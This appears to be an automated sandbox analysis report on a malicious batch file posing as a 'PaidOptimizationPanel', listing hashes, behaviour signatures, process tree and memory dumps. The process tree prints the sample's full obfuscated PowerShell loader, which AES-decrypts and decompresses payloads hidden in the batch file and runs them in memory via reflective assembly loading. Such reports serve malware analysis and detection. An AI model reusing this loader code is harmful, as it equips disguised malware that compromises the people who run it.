Analysis
-
max time kernel
52s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
09-06-2024 02:42
Static task
static1
Behavioral task
behavioral1
Sample
PaidOptimizationPanel.bat
Resource
win7-20240220-en
4 signatures
150 seconds
General
-
Target
PaidOptimizationPanel.bat
-
Size
519KB
-
MD5
f2ab9e899e7a76f48bf673057e7787ea
-
SHA1
596f8f3f081ab0a87bb651adf3918761129cb59e
-
SHA256
4b2bbb9a5c6d64c6bda74a64ad364a8a2a1c8e6b3d93e41a335a5c5792789923
-
SHA512
d39c261f5cec6d4e51e68cd87b14127041cf99507ef0cc9c9bf05872ca72da3bb74d4aacb55f864c00d6532d2a9117616fad5ecd996644a79ff1bac2eb977370
-
SSDEEP
12288:Gw8iMEuAlr97ma3TeLX8Ggbcrgcaa8LCtlO3icephEXsPtOOztWeSN:GiTuMeLkbcMg8LCPMpe6WEG4eSN
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2920 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2920 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exedescription pid process target process PID 2908 wrote to memory of 2688 2908 cmd.exe cmd.exe PID 2908 wrote to memory of 2688 2908 cmd.exe cmd.exe PID 2908 wrote to memory of 2688 2908 cmd.exe cmd.exe PID 2908 wrote to memory of 2920 2908 cmd.exe powershell.exe PID 2908 wrote to memory of 2920 2908 cmd.exe powershell.exe PID 2908 wrote to memory of 2920 2908 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\PaidOptimizationPanel.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8VrnqL5FdmunZzeVZ6qm3mq6yWYLBaHrvu1oPeSLCUs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6e3JZfxMjzGGrf+BTRgQsw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $icvPY=New-Object System.IO.MemoryStream(,$param_var); $fyiKi=New-Object System.IO.MemoryStream; $qOVHn=New-Object System.IO.Compression.GZipStream($icvPY, [IO.Compression.CompressionMode]::Decompress); $qOVHn.CopyTo($fyiKi); $qOVHn.Dispose(); $icvPY.Dispose(); $fyiKi.Dispose(); $fyiKi.ToArray();}function execute_function($param_var,$param2_var){ $BdoSp=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CXjdj=$BdoSp.EntryPoint; $CXjdj.Invoke($null, $param2_var);}$SmpZi = 'C:\Users\Admin\AppData\Local\Temp\PaidOptimizationPanel.bat';$host.UI.RawUI.WindowTitle = $SmpZi;$ACAQw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SmpZi).Split([Environment]::NewLine);foreach ($WeFFm in $ACAQw) { if ($WeFFm.StartsWith('aZvtqFFHKksqGUkZuRxa')) { $Rumeg=$WeFFm.Substring(20); break; }}$payloads_var=[string[]]$Rumeg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2920-4-0x000007FEF5CEE000-0x000007FEF5CEF000-memory.dmpFilesize
4KB
-
memory/2920-6-0x0000000002810000-0x0000000002818000-memory.dmpFilesize
32KB
-
memory/2920-7-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmpFilesize
9.6MB
-
memory/2920-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmpFilesize
2.9MB
-
memory/2920-9-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmpFilesize
9.6MB
-
memory/2920-8-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmpFilesize
9.6MB
-
memory/2920-10-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmpFilesize
9.6MB
-
memory/2920-11-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmpFilesize
9.6MB